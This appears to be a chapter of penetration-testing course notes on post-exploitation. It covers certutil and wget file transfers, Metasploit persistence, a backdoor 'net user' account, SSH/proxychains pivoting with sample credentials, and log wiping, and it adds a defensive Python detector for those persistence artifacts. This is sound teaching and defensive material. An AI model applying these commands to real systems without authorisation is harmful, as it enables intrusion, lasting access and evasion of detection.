# 5. Post Exploitation

## File transfers

```bash
# HTTP via Python (serves the current directory; binding port 80 needs root)
python3 -m http.server 80

# Windows - Certutil (fetch the URL and write it to a local file)
certutil.exe -urlcache -f <URL-TO-FILE> <OUTPUT-FILE>

# Linux
wget <URL>

...
```

***

## Maintain access

➡️ **Maintaining access** during a penetration test refers to the techniques used to **retain control over a compromised system** for extended periods, even after reboots or security updates. This is a crucial phase in **post-exploitation**, allowing testers to simulate real-world attacker **persistence** and assess an organization's ability to detect and respond to such threats.

**Metasploit persistence methods**

1. **Persistence scripts:**
   * `run persistence -h` → Displays available persistence options.
   * `exploit/windows/local/persistence` → Creates a **backdoor** using Metasploit.
   * `exploit/windows/local/registry_persistence` → Modifies **Windows Registry** for persistence.
2. **Scheduled Tasks:**
   * `run scheduleme` → Creates a **scheduled task** to execute payloads periodically.
   * `run schtaskabuse` → **Abuses schtasks** to maintain system access.
3. **User Account Manipulation:**
   * `net user hacker password123 /add` → Creates a **new user account** for persistent access.

These techniques help attackers maintain **long-term access** even after a system reboot or network disconnection. Monitoring scheduled tasks, registry changes, and unauthorized user accounts is crucial to detecting and preventing persistence mechanisms.
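As an added example (not part of the original course notes), the following Python flags the three persistence artifacts named above in forwarded Windows event records: account creation (Security 4720), scheduled task creation (Security 4698) and autorun registry writes (Sysmon Event ID 13). The sample events are constructed; the field names follow the Windows Security and Sysmon schemas, and the autorun key list is an assumption chosen for the demonstration.

```python
"""Detection logic for the persistence mechanisms listed above, run over sample events."""

# Registry autorun locations to watch (case-insensitive substring match).
# "\currentversion\run" also covers RunOnce. Assumed list, extend as needed.
AUTORUN_KEYS = (r"\currentversion\run", r"\winlogon\userinit", r"\winlogon\shell")

# Constructed sample records, shaped like a SIEM would forward them.
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4720, "SubjectUserName": "svc-backup",
     "TargetUserName": "hacker"},
    {"Channel": "Security", "EventID": 4698, "SubjectUserName": "alice",
     "TaskName": r"\Microsoft\Windows\Updater",
     "TaskContent": "<Command>C:\\Users\\Public\\update.exe</Command>"},
    {"Channel": "Sysmon", "EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchelper",
     "Details": "C:\\Users\\Public\\svchelper.exe"},
    {"Channel": "Sysmon", "EventID": 13, "Image": "C:\\Program Files\\Setup\\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Vendor\Config\Path",      # benign registry write
     "Details": "C:\\Program Files\\Vendor"},
    {"Channel": "Security", "EventID": 4624, "TargetUserName": "alice"},  # benign logon
]


def classify(event):
    """Return (category, detail) when the event matches a persistence mechanism, else None."""
    eid = event.get("EventID")
    if eid == 4720:  # A user account was created
        return ("user_account_created",
                f"{event.get('SubjectUserName')} created {event.get('TargetUserName')}")
    if eid == 4698:  # A scheduled task was created
        return ("scheduled_task_created",
                f"{event.get('TaskName')} -> {event.get('TaskContent')}")
    if eid == 13:    # Sysmon RegistryEvent (value set): only autorun paths are interesting
        target = event.get("TargetObject", "").lower()
        if any(key in target for key in AUTORUN_KEYS):
            return ("autorun_registry_set",
                    f"{event.get('TargetObject')} = {event.get('Details')}")
    return None


def find_persistence(events):
    """Run classify() over the event sequence and keep only the matches."""
    return [finding for finding in map(classify, events) if finding]


if __name__ == "__main__":
    for category, detail in find_persistence(SAMPLE_EVENTS):
        print(f"[{category}] {detail}")
```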

***

## Pivoting

➡️ **Pivoting** is a technique used in penetration testing to **move laterally** within a network after compromising an initial system. It allows an attacker to **route traffic through the compromised machine** to access other internal systems that are otherwise unreachable from the external network.

### proxychains

➡️ [proxychains](https://github.com/haad/proxychains) - tool that forces any TCP connection initiated by an application to route through user-defined proxy servers, such as TOR or other SOCKS4, SOCKS5, or HTTP(S) proxies

```bash
cat /etc/proxychains4.conf
# check socks4 port (default 9050; it must match the -D port used below)

# SSH dynamic port forward: local SOCKS listener on 9050, traffic exits from the pivot host
ssh -f -N -D 9050 -i pivot <USER>@<VICTIM-IP>

# e.g. pivoting
# only TCP connect scans traverse a SOCKS proxy: use -sT and skip ICMP host discovery with -Pn
proxychains nmap -sT -Pn -p <PORT> <VICTIM-IP>

proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip <IP> -request

proxychains xfreerdp /u:administrator /p:'p@ssword' /v:<IP>

proxychains firefox
```

### sshuttle

➡️ [sshuttle](https://github.com/sshuttle/sshuttle) - transparent proxy server that forwards over SSH, supports DNS tunneling

```bash
sshuttle -r <USER>@<IP> <NEW-NETWORK/24> --ssh-cmd "ssh -i pivot"
# keep this terminal open
# run commands in other terminals
```

### chisel

➡️ [chisel](https://github.com/jpillora/chisel) - a fast TCP/UDP tunnel, transported over HTTP, secured via SSH

***

## Cleaning up

➡️ The **cleanup phase** is the final step in a penetration test, ensuring that **no traces** of testing activities remain on the target system or network.

The goal is to restore the environment to its original state before the test, minimizing security risks and avoiding any disruption.

* **Remove files** – Delete scripts, executables, and added files.
* **Eliminate persistence** – Remove malware, backdoors, scheduled tasks, and added user accounts.
* **Restore settings** – Revert settings, security configs, firewall rules, and permissions.
* **Clear tracks** – Wipe command history and logs.

📌 From a hacker perspective, you need to "**make it look like you were never there**".

***
